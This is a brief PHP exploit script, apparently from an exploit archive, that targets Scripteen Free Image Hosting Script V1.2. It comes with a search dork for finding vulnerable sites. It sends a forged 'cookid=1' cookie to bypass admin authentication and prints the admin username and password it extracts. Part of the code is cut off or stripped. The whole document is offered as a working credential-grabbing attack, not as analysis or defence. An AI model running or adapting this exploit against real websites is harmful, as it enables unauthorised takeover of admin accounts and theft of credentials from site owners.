Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit

Coded By RMx - Liz0ziM

Web:www.biyosecurity.com

Dork:"Powered by Scripteen Free Image Hosting Script V1.2"

TARGET HOST: Example:www.xxxx.com

TARGET PATH: Example:/ or /scriptpath/


Sending Exploit..
'; $packet ="GET ".$p." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cookid=1\r\n"; $packet.="Connection: Close\r\n\r\n"; yolla($host,$packet); preg_match_all($desen,$veri,$cik); $ad=$cik[1][0]; $sifre=$cik[1][1]; if($ad AND $sifre){ echo ' Exploit succeeded...
Admin Username:'.$ad.'
Admin Password:'.$sifre.'
'; } else { echo 'Exploit Failed !'; } } ?>